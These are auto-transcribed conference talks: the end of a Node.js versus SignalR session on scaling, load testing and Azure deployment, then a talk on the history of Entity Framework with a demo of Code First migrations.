Tie a law. Then you can see stuff happening via Redis, which is kind of cool. Cool. There you go. Wow. Yeah. Webfarm in a box. That's scale out, right? It's nice. Rob, do you like cake? I like cake. That's a Hanselman thing. Yes. When you don't know what to say, do you feel like a complete idiot? I like cake. To pick up where Damian is talking about, one thing about Redis and Express and Node in general is that you pick what you want and you enable it. That's one of those things that's in the community. Here is, at Socket.io, there's modules that you can plug in. This actually is just the wiki to show you how to configure it, but if you want to use a Redis store, you just tell it you're using Redis store. You can use different Redis stores for Pub and Sub, publish and subscribe if you want. Here is just creating three clients using, and this supposes that you have Redis installed and also required in your app. Then you just say, Socket.io set the store to a new Redis store and then you just set each one of those things and you're rocking on Redis. I don't have a demo, sorry. But what was I going to show? Should we talk about how to do load tests? Let's do load. Let's bring it. I want to see a web scale. Yeah. This is actually funny. I want to make this point. I made it in my talk the other day. What Node is good at is delegating the IO stuff. In other words, delegating database, delegating file system hits, delegating all that crap and then it goes and it keeps its little CPU executable process just doing computation. If you have a synchronous system like Ruby on Rails, Ruby on Rails, when you come in and you hit a database, you'll have some code, code, code database hit and it'll wait. Just sits there and waits, waits, waits. Result back, feed it back to request. You're blocking a thread. No doesn't do that. No just takes the call. It says, okay, you got a database hit coming in. It hands it off to the event loop and then goes and does other stuff and checks back later for what's down at the bottom of the event loop. That's how Node scales. It's not a silver bullet or anything. It does help when you're doing evented stuff. To show how to do a load test with Node, there's this really groovy thing. I think this is it. Node load. Yep. Node load is a Node module. You can just install it and run a few commands and that is exactly what I'm going to do right here. While this is going down, to run it, it gives you some examples. As always, you can actually load test your app with some pre-configured scripts that it gives you, which is kind of handy. I've gone through the directions here, install Node load and I am going to go into the module directory after it's installed. Cool. Node modules, Node load. Now I'm in here. It gives me a handy dandy command. Where is it? To run a basic Node load test. I'm going to copy that. Yes, I've got to run this in one line. Examples, tests, server.js. By the way, you don't need to do this crazy command. You can have your load test.js file right in the root. I'm just trying to use their examples. That's why you're seeing me enter this craziness right here. Test server.js. Then I've got to pass it. I'll run it in the background actually. That's up and running. It's forked a process and it's running in the background. Then I'm going to go, let's see. Actually, I should have run that all once. Great. I ran it in the background and forked it. Hey, look. While that's happening. Let's see. One more time. Please, sorry for the delay. I have that too. That's awesome. There we go. Okay. I'm fumbling around in Perfmon trying to find. Here we go. I'm not alone. I'll put that there. I'm trying to think of when you node load test, you load node test or there's something there. Good. Okay. This is now running and working. Test server.js, I'll just show you the file really quickly. It is inside node load, inside examples, inside test server. This is a node load test. The idea would be if you want to load test your app and see what's going on, you would take something like this, put it in the root, get ignore it, whatever you want to do. All this thing is doing is randomly setting a timeout on the response. It's just saying maximum delay is 500 milliseconds, math.roundit, plus 1000. Let's see what's going to happen. Then it's listing on port 9000. That's it. The command that I just gave it was to do 10 clients, maximum 10 requests or 10,000 requests. I don't know what dash i means. So let's see. If I go to, it says good. I think it's 8080 that it's running on. Oh yeah. Logo host 8080. Come on, run. Oops. That's nice. Okay. Well, while you're making that work. Did I crash that? Yeah, go ahead. Go ahead. So what do you got Damian? The equivalent in IS, ASP net world is the tool called Wcat. So the IS team puts out this web capacity analysis tool that you can use to generate load, HTTP load against your server. So while it's not specific to ASP.net or node or anything, you can use this to generate load against anything that can take an HTTP request. So I'm going to use it to simulate listening signaler connections. Signaler has this performance test harness called flywheel, which is on GitHub. And it is an endpoint and a dashboard that gives you a whole bunch of stats about what you're, sort of what performance you're currently getting. And so at the moment, I have no one connected to the endpoint. You can see there's no connects. So I'm going to come down to my console and I'm going to start up a batch file that you can get from our crank repository. We have another repository called crank, which contains these settings. And that's going to start up a thousand virtual clients on this box. This is just, this is a three year old notebook, so I don't expect an awful lot. But we should see the connection counts now going up. You can see that over here. So I'm getting connected signaler clients. I'm not broadcasting anything yet. I'm going to wait until it gets to a thousand. So that's about there. So I'm going to come over here and say, let's go and broadcast five messages a second to all 5,000 clients. And you can see my sense per second now has grown to around 5,000 cents per second. And so my little graph is showing me that I'm getting 5,000 cents per second through signaler through two to my thousand virtual clients. And my CPU, while it looks like it's really busy, most of it is actually drawing that stupid graph. 36% of my CPU, 35, the IAS is actually only using like 40% of my CPU. So we do know from the current version of signaler on my Perfreg at home, which is a three year old Core i7 920, so a first generation i7, I can do with about 5,000 users on a separate machine about 30,000 cents a second. Now at that point, our bottleneck isn't CPU. We have some architectural issues in the core of signaler, which we're going to be fixing in 0.6, and we hope to double, if not triple that number. So we have very smart people on the ASP.net team working on this now, now that it's not just me and Fowler doing it in our spare time, we have people smarter than us who are helping us sort of re-architect the core of it to make it better. But yeah, this is kind of cool. You can just get this from GitHub and try it yourself and see what sort of performance and resources you'll need. Okay, we've got like eight minutes left. Okay, I just want to really quickly point out. I forgot to fork the request. You do that in the command line by passing it in ampersand right there, so I forgot to fork it and it wasn't running properly. So I'm up to... Wait, while you're doing this, it would be cool if we can do some deployment. So I was thinking Damian could start in trying to deploy it. Get it into the clouds or wherever you want and then you can talk about... Yeah, I'll just finish this up real fast. So this is just spewing back requests. There's a throttle on the Mac, unfortunately, that kills a certain amount of requests. So I wish I could do as much as Damian was doing when I can't. But the point is, it spits out this really nice graph. You don't have to just test locally. I could test remotely. If I could see Damian's port, I could load him up with a million requests a second. Melt his laptop, which would be kind of fun. But this is outputting a chart... Final one unauthorized. Final, right. So you can see the line is pretty flat and that's what you want to see. Also the CPU right here under the node... Stop it. So node is running at 1.5% of my CPU. And if you were to see me, where are you? So I got two processes running because I got one server running and I got node running the load test. If you were to see my talk yesterday when I wound node up, it pegged my CPU 100% with an infinite loop. So this is actually nothing. And so the requests are coming in at pretty high volume. Ryan Dahl has an amazing demo that he does where he nails node on his little laptop and flat lines the request. It's a really nice thing to see. You go, Azure Boy. Well, so I was talking to Rob on Sunday about this a little bit and I was, you know, Damian, we're thinking it'd be cool to actually deploy this. So... This is the first time I have ever deployed anything to Azure and that didn't work. How will this second time... Oh my God! Look at that. Oh! Touchdown! Thank you. So that's using the new Azure websites. I'm going to be a dancing girl right now. That's using the new Azure website. So we... I can't see. Yesterday. And so I set this up before we came in. I literally just went and signed up for the preview. I created a website called NDC Cage Match. But as you saw that screen before, I hadn't deployed anything to it. It said the site was created. I'd never deployed anything to it. I downloaded the publishing profile, which you can do from the Azure portal. I imported that individual studio. You probably saw me do that right now. And then I hit publish. The first one... Azure is TDA. Sorry. What? What? It does my laptop. There's no leak. I'm amazing. I'm amazed. I'm amazing. So all I had to do was retarget from 4.5 to 4.0 because the websites feature of Azure currently doesn't support.NET 4.5. But I did at the same time provision a Windows Server 2012 RC, what do you call them? Durable VM. Right. So if I wanted to, I could actually publish this app to a Windows 8 server, basically, Windows 2012 server. And I would get WebSocket support in Azure as well. So that would be kind of nice. Cool. I'm pointing you guys at a handsome in post. I tried to get this thing going before the talk. The collision of timing of the announcement and the demo just didn't work. But the app I just wrote could be pushed up there. It does not support WebSockets. Neither does Heroku and most hosting services. But Socrates, as I mentioned, abstracts that away. So I could have had some time, punch up my laptop up to Azure as well. And yeah, if you want to know more, go see Hansman's blog. I could also have deployed it to Heroku. There's nothing that stops you from having a socketed application, even if they do block WebSockets. So. Nojitsu. Andrew says that Nojitsu, he thinks, supports WebSockets. And also, if you have a VM, I think of Amazon, I think you can do it. Right. That's, Damian was looking at that this morning too. And I thought it was cool, and we were looking at that post earlier, but you can get pushed to deploy too for no kind of need. Okay, so we've got roughly four minutes left. Now's a good time for questions if you've got them. What's this line right here? Question? Web.config in my Note app? No way. So the question is, when you've got WebSockets support, are you worrying about the client or the server? You know what I mean? It's a really interesting question. You go first. Sorry. What was the question? Who needs to support? Both. So in the.NET world, WebSockets on the server in ASP.NET requires Windows 8 server and ASP.NET 4.5. The reason is that the WebSockets is needed to be supported at the HTTP handshake level, and that's done in Windows by HTTPSys, which is a kernel mode driver. It's one of the reasons we're serving Web traffic on Windows and scales really, really well is because you can actually serve files directly using I.O. from the kernel level without ever getting into user mode, which makes it really, really fast. But it means you have to rev the operating system when you want to make changes to that because it's a kernel mode driver. But SignalR can be hosted on more than ASP.NET. We're not actually tied to ASP.NET. So you can host SignalR on top of whatever you like, your own XE. You can put on one of the open source Web servers like Kayak or Firefly, which just use raw Sockets, and they can do WebSockets just fine. Okay. And then as you mentioned earlier, there's the client side too. You've got to worry about if you're client, but you've got the graceful fallback down to forever. Yes, all browsers support WebSockets, including IE10, which we all have, right? With Socket.io, it's with all things Linux and Unix. It's not exactly easy to get this running on any server. So if you're using Nginx, you actually have to, I don't believe WebSockets works with Nginx 1.1. I might be wrong if Socket.io guys here shouted out. But there's a build of Nginx that you can install. And if you've ever done Rails, you know there's like a little shim kind of thing called Fusion Passenger that will sit behind your server and will monitor your Node.js thing. So if Node goes down, it reboots, it pops it back up. So just to point this out, I used Express just because I wanted it to support. You don't have to. Socket.io stands on its own. So you can just require HTTP as you see right here. And that's just the core Node HTTP response. And then listen with Socket.io and it'll run. So you mentioned a few things. One is a passenger, Fusion Passenger. And the idea that Node.exe is just an EXE, and if it dies, it dies, right? So IAS you've got over there is monitoring and restarting and doing all that stuff. But you've got other things that you use kind of to host and support Node as well. Okay. Any more questions? Question? Yeah. So the question is from hubs, can you send to a different client rather than just broadcasting to everyone or the one that called you? Yes, you absolutely can. Let me just bring that up very quickly. I stupidly closed that project. I think it was number 14. Yeah, I should mention while he's doing that that both SignalR and Node support the concept of rooms. And they also support the concept of knowing who a client is. We didn't show any authorization, but you can have authorization down on the socket calls. One of the things I forgot to mention this about NGINX2 is there's a lot of port blocks out there. So if you're using WebSockets or SocCodeio with anything, if you send it over 443 over HTTPS, you generally have no problems. That's according to them at least. So I just want to throw that out there. So as you can see here, the client's property is also an index property. So you can pass into it either a specific client ID, which you can get from, in the case of hubs, you get that from context.connectionID. So you can scroll that away and store that wherever you need to. So generally what you'll do in a SignalR app is you have some type of authentication like you normally do, and you have a username. And then you have some way of storing for a given username one or more connections that they're currently using. And then you shove the connection ID in there that if someone says, I want to send a message to Damian, you look up the connection IDs and you send it to those connection IDs. Similarly, we have groups. So there's an add to group. I think it's groups.add. So you can add a connection to a group or remove them from a group and then you can send just to that group. Yeah, and Sakira is almost exactly the same. More questions? Last question? Nope. I'm ready to declare a winner here, which is me. I am the winner. I appreciate your guys' trying or whatever. But thanks a lot to these guys. Give me a hug. Thank you.
|
You can't have a conversation about web technologies these days without someone dropping a mention of NodeJS and web sockets. If you're a .NET developer, someone will then reference SignalR with ASP.NET Web Pages or MVC. But what are these things? Which one is better? What do they do and how do they work? In this special "Cage Match" Rob Conery puts NodeJS up against Damian Edwards and SignalR - showing you the two technologies side by side in a bit of a tongue-in-cheek challenge.
|
10.5446/50988 (DOI)
|
All right. Hello, everybody. Hello, everybody. Hello. My name's Scott Allen. Thanks for coming out to this session. What I want to do is show you a few new features that are in the entity framework, but I also want to take some time to look back at a history of the entity framework because in thinking about the entity framework over the last few years, I've realized there's a lot of lessons that we can learn as software developers from how the entity framework originated, how it was delivered, how the entity framework took on feedback from the team. So I'm hoping we can first learn a little bit from the entity framework and then see some of the things that they did to learn from those lessons and some of the new features that they've added to entity framework 4.x and beyond. The entity framework was released in the first version in August of 2008. That was one month before Lehman Brothers, which was the fourth biggest investment bank in the United States before they declared bankruptcy and the world descended into economic turmoil. I'm sure that's just a coincidence. But the story of the entity framework actually starts much earlier than that 2008 release because Microsoft really, they have a long history of delivering tools and frameworks that are very data-oriented. A lot of people had great amounts of success with these products. So Visual Fox Pro and Microsoft Access are two examples of applications that help you to paraphrase what was in the keynote the first day to help you induce vomiting on the database, right? Help you leave it, throw up data on the screen in a nice way, not in a drunk disorderly way, but more of a friendly vomiting on the screen. And now we have Visual Studio Light Switch, sort of has the same purpose. I have a database, I want to get data on the screen, allow me to page it and filter it and sort it. As.NET developers, we've typically avoided those types of tools. And if we looked at the landscape in.NET 1.0 when the framework first shipped, really the only thing that we had to be able to access data was the stuff in the system.dataminspace. So we had commands and data readers and data sets. And the data set was kind of an interesting class in the sense that you could have data tables and a data set and those tables could have relations and you could have constraints and form views to do filtering and sorting all those tables, but they are all data oriented, it was still data oriented. And in.NET 1.0, most of us were doing object oriented programming or trying to do object oriented programming and languages like C sharp and Visual Basic. And we didn't like the data oriented approach of this data set, which was really an in-memory database if you think about it, minus the transactions and a few other features. So what we really wanted to do was get data out of the database and put it into objects and a lot of people found different ways to do that in the early versions of.NET. Third party vendors provided tools and there was code generations and there was the early object relational mappers and we thought we were going to get something from Microsoft in the form of a project called object spaces. Anyone here of object spaces remember that? Just a couple people. So it was about 2003 when Microsoft said we're working on this thing called object spaces and this is one of the early architecture diagrams of this framework that was in MSD and magazine and it's conceptually simple, right? It's an object relational mapper. I have an application, inside of that application I've.NET types defined. If I have an instance of that type I want to be able to take it, pass it through object spaces and put it in a database. Not worry about SQL connections, SQL commands, SQL parameter, all that other stuff. And if there's something in the database I want to get out, I should be able to somehow tell object spaces that I want the account with an ID of one and it just gives me back an object. Again, no parameters, connections, commands, any of that stuff. We were looking forward to that coming out in Visual Studio 2005 but around 2004 Microsoft said no, wait, we're not actually going to ship object spaces. What we're going to do is take object spaces and put it in something and make it even better. We're going to put it in something bigger. It's going to be part of one of the pillars of the Longhorn project. Anyone remember Longhorn? That was an operating system code name that's about when Microsoft hired Richard Scoble to dress like a Viking and go around and blog and scare people. It became the Windows dista operating system. There was a lot of celebration when that operating system shipped. That was kind of short lived. But object spaces, it might be hard to see on the screen but over here under the WinFS category, that's object spaces now. It was an object relational mapper but now it was just a small part of this big framework that Microsoft had great aspirations for, WinFS. WinFS was going to be the technology that was all things data access. Just like Avalon was going to be all things for the presentation logic, Indigo which became WCF was going to do everything for communication. WinFS was going to be able to talk to relational data, semi-structured data. The idea was that you could read data out of Microsoft money and Microsoft Flight Simulator just as easy as you could Microsoft SQL Server. It was just going to be pure magic. Unfortunately, well, before we get to the unfortunately part, this was how it was described in an early article. It was going to be a quantum leap in the way that we develop and work with information. And again, another architectural diagram of WinFS and the important part to take away from this is that they were thinking about link but they were also thinking about all these other things around data, how to sync data, how to back up data, how to read data out of images on the file system, think about different schemas, different data models but compare that diagram to what we saw earlier and it's a lot more confusing picture now, right? It's no longer, here's an application, here's a database, just give me something to move data back and forth. Now we have all these different sorts of concepts and crazy things going on and to a large extent that's why WinFS never shipped. Microsoft eventually said we're not actually going to ship WinFS with Longhorn and then eventually they said we're not going to ship it at all and to some Microsoft people that were brave enough to blog about this, they actually described WinFS as a black hole. Now why am I going through all of this? It's because Microsoft promised that when they canceled WinFS, they said we're going to take a lot of the concepts and ideas from WinFS and deliver them in other technologies and it turns out a lot of the ideas that went into the entity framework came from this WinFS technology but the problem with this technology is that the architecture astronauts got a hold of it, right? You've heard of the term architecture astronaut, just Google Joel Spolski has a couple blog posts on this topic and the primary problem is that an architecture astronaut is so smart that he looks at a or he or she looks at a specific problem like accessing data in a relational database and says that specific problem is really just a general case of a bigger problem which is I want to access data which is a bigger case, a special case of an even bigger problem of, you know, I need to get some stuff all over my enterprise which is just a specific case of a bigger problem which is world hunger so we're going to solve it all, right? We're going to solve all those problems but we're going to forget to actually ship something so lesson one from all of this is that you don't let the astronauts solve the customers problem because they over generalize things too much. That's lesson number one from the entity framework. So as I said some of those ideas in WinFS, they filter themselves into the entity framework. In fact this is a quote from Quentin Clark who was one of the PMs on the WinFS team who said the APIs that you see in the entity framework of ADO.net they came basically out of WinFS. And so when the first version of that entity framework did arrive in 2008, this was the architecture diagram for it. Again, a lot more complexity in there than the simple object spaces framework that we were expecting four or five years earlier. The centerpiece of the entity framework was this conceptual data model and the idea was that a developer or someone on a development team would build this conceptual data model that would isolate them from the specifics of database schemas and allow them to describe the ideal world that they wanted to program in and then program against that conceptual data model and in the background somewhere it would be able to access databases. Is that the Rob Connery session blasting all the music over there? Geez, that guy. So a lot more complicated is this diagram but it really went beyond that. The astronauts were still in charge because they were saying we're going to deliver a framework with this entity data model that's going to access relational databases, it's going to allow developers to get the SQL server but it's also going to allow information workers to do reporting off of this with reporting services. It's going to allow people in office to synchronize data to the cloud, again, trying to solve all problems for all people, very far away from what we really just wanted which was a simple object relational mapper. And so when the entity framework shipped, the ironic thing is they had all these visions about doing all things data for all these people but the only thing it could do when it shipped was talk to SQL server. In fact, the only thing you could do is reverse engineer SQL server database to create that entity data model and talk to SQL server but they had a focus on so many other things that immediately or even before this thing shipped, people started blogging and talking about limitations in entity framework version one, unimplemented link operators. Even though it was designed for this model, to build this entity data model, you couldn't actually do a model-first design. You had to have a database in place first. And then the last bullet point there was the kicker for a lot of people and that was the performance of the entity framework wasn't that great. People started doing blog posts comparing the performance of the entity framework versus link to SQL which another object relational mapper that Microsoft eventually shipped which kind of came out of object spaces but that's a whole different story. Link to entities, it's that graph that represents how the entity framework would perform when you did a link query against SQL server tremendously slower than using a data reader in every way. It used more memory, took more time, required more CPU percentage. And so the problem here is that the entity framework delivered us a product and the only thing it could do was talk to a SQL server database. It was designed to do all these other things but what we wanted to use it for and the only thing it could do at that time was talk to SQL server and it didn't do it very well. I like to compare that to Dropbox. There's a question and answer site out there called Quora where someone went to the site and said, why is Dropbox so popular? They don't have all the features that all these other sync technologies had. And the answer that was posted to that was, well, think about the sync problem. You want to folder, you want to put stuff in it and just have it sync. When the architecture astronaut looks at file synchronization, they say, well, we'll need that to generate RSS feeds and we'll need to synchronize things in the cloud and write reports against it. Well, no, that's not what 98% of people want. They want to folder, put stuff in it and it syncs. Very simple. So there was this large backlash against the first release of the entity framework including an entity framework vote of no confidence which was a web page that someone stuck up and then within hours it had a couple hundred signatures and basically the text in there said, here's the reasons why we don't believe in the entity framework. Here's the reasons you should avoid it. And they were all very legitimate. And the problem really was that they didn't solve any one particular problem very well. It came out with such a generalized architecture in preparation for solving all sorts of different problems that the one thing that it could do which was access SQL server, it didn't do it very well. It had technical limitations. So faced with all this negativity about the entity framework, Microsoft launched a nice small marketing campaign just kind of like they did with for Windows Vista when they had a Jerry Seinfeld commercial. Don't ever know if that made it over here in Europe. It only showed for a couple nights in the United States and didn't get a very good response so they canceled it almost immediately. It was just Jerry Seinfeld and Bill Gates walking around doing weird things like trying on shoes and talking about cake. Probably find it on YouTube. The entity framework team did something similar which is to blog and basically start a marketing campaign and messaging about the entity framework. And if you could summarize what they were trying to say, what they were trying to say is that don't call the entity framework an object relational mapper. Don't compare it with those other technologies like link to SQL and Hibernate. That's really not fair. It's an apple to oranges comparison. It's not an object relational mapper. It's a conceptual level development platform, whatever that means. So that was one post from a PM at Microsoft. There was another one from Danny Simmons at Microsoft who said, you know, the big difference between EF and Hibernate is that we have this long-term vision for the data platform we're building around it. It didn't help any of those. It didn't help those of us who were trying to use it from the first day that they had these long-term visions because we're trying to use it immediately. Really it generated a lot of confusion because then people were thinking, well, is it an object relational mapper? Does it talk to a database or not? Because they're talking about these conceptual data independent platforms. I'm not exactly sure what the entity framework does anymore. But if you look at it, it certainly walks like a duck. So it walks like an ORM and it talks like a duck. It talks like an ORM. What Microsoft was saying was, no, it's not really a duck even though it looks like a duck and walks like a duck. It's really a swan. It's just going to take a few years to get there. It's just all complete magic. And essentially what Microsoft was saying was, we're making a promise to you that this will get better. And there was a Scottish poet, I think his name was Robert Service, who said, a promise made is a debt unpaid. Microsoft's entity framework was going in debt saying, if you use our framework today, we promise we'll pay you back tomorrow. Or it might take a little longer than that. It might be next year, three years. But don't worry, we're Microsoft. It's not like we ever kill off any frameworks or platforms that we have. So lesson three, when I think about it, I think you should never ask your customer for a long-term loan. Always try to be delivering something to them, be honest with them, be upfront with them. Don't try to spin missing features with marketing talk and say that you'll eventually get there. So now there's a lesson we can learn. The first version, the entity framework, when people reverse engineered their database, they generated this entity data model. What the entity framework does is take that entity framework, entity data model, and it generates C-sharp code for you. The first thing you do is you open up that generated code to see what it looks like. And, you know, there was a lot of stuff in there. It had a base class called entity object that had all these serialization attributes, it had all these partial methods. And a lot of people looked at that and said, that's not what we want from this framework. We want simpler objects. We want to be able to take control of that code generation. Or we want to be able to use our own classes and plug it into a data model. Well, with the entity framework version four, which was really the second version of the entity framework, they just incremented the number to synchronize with the.NET framework version, ostensibly, but could have been marketing, too. They introduced some extensibility in that code generation mechanism. So now, when you have an EDMX file in your project, and it's up there in the designer, you can right-click it and say, add code generation item, and select from a template that allows you to generate code in different ways. And one of the templates that they delivered for EF4 was the Poco entity generator, where Poco stands for plain old C-sharp object, unless you were a VV programmer and called it plain old CLR object. But either way, the code that was generated from that was much simpler. You didn't have a base class, you didn't have all those crazy serialization attributes that it tried to generate really straightforward C-sharp code. And I know a lot of people that started using it, but I always found it strange because years ago, I read a book called Pogo's in Action. So Poco derived from Pogo. Pogo is plain old Java object. Pogo was a term coined around the year 2000 by Martin Fowler to describe simple Java objects that were being implemented by Java developers, because at the time, Java developers were facing the enterprise Java Beam specification, which required them to write a lot of boilerplate code and divide up their code artificially into these transaction scripts just to satisfy this framework. And they didn't like it a lot, so they said, hey, what we'd like to do is actually just implement business logic in a simple Java class and do unit testing or domain modeling or whatever we want to do and have something simple and then plug it into these other frameworks. Instead of having the frameworks drive our code, we want to drive our code and plug it into the framework. And that to me is the real essence behind Pogo and Poco. To me, a Poco is never something that you would code generate. A Poco is something that you care about, that you want to create, that you want to design using test driven development. That was another complaint of the ADO.net entity framework voter no confidence. They said that what you're doing is promoting an anemic domain model. That is, you generate all these Pocos from the database and they're just property, property, property, property. There's no good way to add behavior. Yes, you can create a partial class and add methods in there. But then you have your methods over here and your data over here and it's just really hard if you want to start from scratch and write your own C-sharp class from scratch to be able to work with this. Because again, Pocos to me are all about having something and having a C-sharp class and classes building your model caring for it, feeding it, hoping it grows up to be a big maintainable domain model. But I've witnessed firsthand more than one company that has used that Poco template and said and will say to me, hey, we're following best practices. We're using Pocos with the entity framework. That gives us a great business layer. That gives us something that we can take and just serialize it out through WCF and bind it as a model in MVC. But they had really no understanding of what a Poco really was, I don't think. So this picture is a, if you search for cargo cult on Wikipedia, this is a plane made of bamboo on an island of a cargo cult. I won't go into what a cargo cult is, but that's something you could look up on Wikipedia. So I think the problem here, the last one we can learn, is that the entity framework, even in version four when they are trying to deliver these new features, they still didn't understand what the problem was, what some people had, what the problem that some people had with the entity framework, which was that it was generating code, it was promoting data centric models. All right, just one more lesson to go. That EDMX file, when you open it up in a designer, could get kind of complicated. And I think when you're designing a framework or something that a developer or a user is going to interact with, you really have to think about the experience they're going to have. If I'm building a simple applications with 10 or 12 entities, then, yeah, that designer works pretty well. But when I have a database with 150 tables in it, or I have a model that I want 150 entities in it, the designer kind of gets complicated. Starts to look a bit like a circuit diagram. So this is what it looks like when you have about 150 entities. This is what it looked like when you had too many entities. And that visual designer just didn't meet a lot of people's needs. And behind that designer, what an entity data model really was, was a big XML file. And it was quite common that you would interact with the designer or update things from the database, and you'd get these error messages about stuff that's inside the XML that were just undecipherable. You look at an error message like this, and there's probably 25 people on the face of the planet that know exactly what that means, and they all worked on the team. I translated it into Norwegian just to see if it would make any more sense. But you know what it means to me when I see that? It means just revert and go back to the last good check-in, and then try those changes again and see if they were. The irony to me is that if I want to build a model like this, just two classes, employee and department, if I have to use that visual designer and create a bunch of XML, those two class definitions would require that much XML in the EDMX file to generate that. And if you look at what's inside of an EDMX file, what you'll find is that it's really just metadata. It's describing type names, data types, relationships. But so are my C-sharp class definitions. There's a name, there's a column name or a property name, there's a data type, there's a relationship. It's all the same information. Why did we have to start with XML to get the simpler C-sharp code? Why don't we start with the C-sharp code and not worry about the XML? Well, XML is just one of those favorite things that Microsoft likes to use. The XAML team, the team that built WPF and technologies like Silverlight said, hey, we're choosing XML because it's toolable. And I've always found it, well, at first glance, if you look at it and you say, okay, Microsoft is a tool company, they build tools. So it would be a natural choice for them to pick an implementation language that's very toolable. But if you go back to the keynote on the first day and you start to question and think about it, what problem are they really solving? Well, if a software vendor that has expertise in building tools has chosen an implementation language that's toolable, then they're solving their own problem. They're not solving the customer's problem. They're making it easier for themselves to build tools like the entity data model designer and blend, not making it easier for me. I mean, if I want to animate something using CSS3 in a web browser, that's all the code I have to write. If I want to animate something in Silverlight to animate a background color, hopefully I'll be using a tool to do that, generate all that XML. I think it's just not having empathy for the customer when they set out to design some of these things. Those are my five lessons. Let's see how they are doing these days. What I'm going to do is switch over to a virtual machine that is right here. We're going to take a look at a simple console mode application, Visual Studio 2012. Right now it has no references to anything entity related, but it does have a couple type definitions in here that I'd like to interact with. Here's an employee. Just the employee has an employee employment status. If I go to that, that's an enum. I have a department that has a collection of employees. What I'd like to be able to do is instantiate some employees or instantiate some departments and give them some employees and save this all in the database and use the entity framework and not get involved with designers and XML files and all sorts of things like that. One of the lessons they learned was to deliver software more frequently. What I'm going to do is use NuGet to install the entity framework version five, which is still a release candidate, but presumably will be released when.NET 4.5 is released. Install EF5. While that's installing, I'll tell you there's already been a release of the entity framework this year. They released 4.3 this year. They released 4.1 and 4.2 last year. They've already gotten a lot better at listening to feedback and delivering software more frequently so that people can tell them what they like and they don't like about this. I have just installed the entity framework. All that really should have done was added a reference right there and changed my add an app.config file that just sets up the entity framework to use a connection to localDB. If you haven't heard of localDB yet, localDB is just another type of SQL Express instance. It's a SQL server process that's running on my local machine just for me. I can add databases to it and I can still interact with it through server explorer and things like that. It's going to talk to localDB. Just having that reference in my file, now what I can do that I have this model is I can go out and create a class to start persisting it. I'm going to insert a class. Let's call it companyDB and just have it derived from a class called dbcontext. If you haven't worked with the entity framework, this is the simpler dbcontext API that wraps that old object context API that's behind the scenes and makes things a little bit easier to work with. The only thing I really need to do to get started here is to give this thing a property of type dbset which ultimately implements Iquariable. This is formerly what you would think of as an entity set, a dbset and let's just add department. I could add employees too but I'm just going to add department to this. That's how I want to get into the database and get to employees through my department. Now I have everything in place where I could create a database and the way I'm going to do that is to use some features that are new to the entity framework as a version 4.3 called code first migrations. I need to open up the package manager console and the first thing I'll do is enable migrations. I'll show you what this will do. This will add a file, a folder into my project called migrations and inside of that will be a dbmigrations configuration-derived class that first of all sets up automatic migrations. I'll explain what that means a little bit later. It gives me a seed method. This is basically what I'm preparing to do is have the entity framework manage my database schema for me. This is one approach to working with databases. It's a great way when you're first developing a project to just get up and running quickly with the database. When it's managing the schema, it can also seed the database for me. If I just completely drop the database and recreate it, it can put some additional initial data in there for me and things like lookup tables and so forth. I do want to seed the database. Just give it a department with some employees. I could say give me a new department. We'll give that department a name of engineering. I'm not sure I spelled that right, but that's okay. We'll say department.employees. Let's create some employees too. Give me a new employee. We'll just set the name. I think name of Scott. New employee name equals Sue. And one more employee. New employee name equals Rob. Let me do a build. Let me also do a context.save changes and do a build. And now what I can do. What did I do? Oh, yes. I need to tell the context to add, sorry, context.departments.add or update this department. And so since it's seeding, what it can do is actually go in and see if that department by that name actually exists. And if it does, it won't try to seed it again. Thanks for catching that one. So we'll build. And the next thing I'll do is create an initial migration script using the entity framework. So again, go to the package manager console and say add a migration script for me. Let's call it the initial migration for my initial model. So I'll make changes to it later. And that added a file to my project called initial that inherits from DB migration. And in here is essentially a somewhat fluent DSL for performing DDL statements. So create table statements, create index statements, things like that. So give me a table called departments. The second parameter to this is basically a delegate that will get passed in a column builder. So this lambda expression C is a type column builder. And you basically can use an anonymous type to describe the columns that you want. So I want an ID column that is not nullable. That's going to be identity property. I want a name that's a string. Maybe I want to set something like the max length. These are all optional parameters that you can, if you have a value to specify, you can just use a name parameter to say something like, I forget what max length is, just max length. Max length, 255. Right? Whoever designed that API at least had some empathy for who was going to use it. You know, they were thinking about how can we make this easy for developers to express? How can we make the code a little bit readable? Create a table called employees. Oh, the other thing I could do here is, yeah, give it a primary key of an ID, but maybe I want an index too. Maybe I want an index on the name property. And to make it make sure that the department names are unique. You can do that too in here. So you can certainly modify these migration files after they're generated by the entity framework that package manager console, essentially when you run that program, it looks at your existing model definition. So it's looking at all that rich metadata that the C sharp compiler can produce from a.cs file, all the type names and property names and data types. It looks at your model definition and figures out what sort of schema I could build to save that model. So we have the department's table, the employees table. It's set up primary keys. It's set up foreign keys. It's set up nice little indexes that will probably need. Like if I have employees related to a department, chances are I'll look up employees by their department ID. All right. I can come into the package manager console again and I could tell it to now update a database which is look at my current database that's in place and if it needs any new migrations, just go ahead and apply them. I don't have a database yet. You might be wondering what database this goes to. There's a lot of conventions in the entity framework now. So if you don't explicitly give it names or explicitly give it connection strings or explicitly map things, it's just going to figure things out based on names. It's just going to connect to local DB and create a database that has the same name as my DB context derived class which was company DB, including the namespace. And that's what will happen during update database. But before I do that, I'll tell it don't actually update the database, generate a script for me so I can update the database or so I can hand it off to a DBA or I can check it in the source control. So this is the SQL. It's going to execute when I actually do update the database. So create tables, create unique indexes and then it uses a migration history table inside of the database to track all the migrations that it's going to apply against this database in the future. So you can see that has a migration ID, has a... I can't remember if that's a hash of the model now or if it's like a full model definition that's in there. I tend to think it's now it's a full model definition and some internal version numbers that it uses. So if I want that to work, I can just say update database without the script part and you can see it applied the migration, ran the seed method and that means if I open up the database, SQL server object explorer and refresh. I now have evolution.companyDB so just determine the database name based on the name of my DB context class. It has departments, it has employees. Let's look at the employees. It seemed to get my three employees inside of there. Oh, I forgot to set a status on them. Let's give one a different status. So my employment status terminated was 86 for whatever reason. Let's give this one a terminated. We'll terminate Rob for blasting music. And I should be able to use this now. So DB equals new company DB, query equals DB.departments. Oh, yeah. Let's include. When we get a department, I want to include employees and the reason this is fighting me right now is because the strongly typed include method is in a different namespace. It's an extension method. So if I do a using on system.data.entity, then this should be a little bit happier. So include or maybe not include employees and let's just put that in a list. Alright, so now we should be able to foreach department in the query and write out the department name. And we should be able to foreach employee in department.employees. And we could write out something like let's tab over and write out the employee name, comma, employee status. So employee.name, employee.status. Let's try it. Yeah. I think I just closed it. Try that again. So no XML was required in the making of that. No visual designers, no crazy messages. It's kind of nice. What's interesting is behind the scenes, all of that machinery is still there. There still is an entity data model. It's just created on the fly now based on the CLR type definitions. And so they 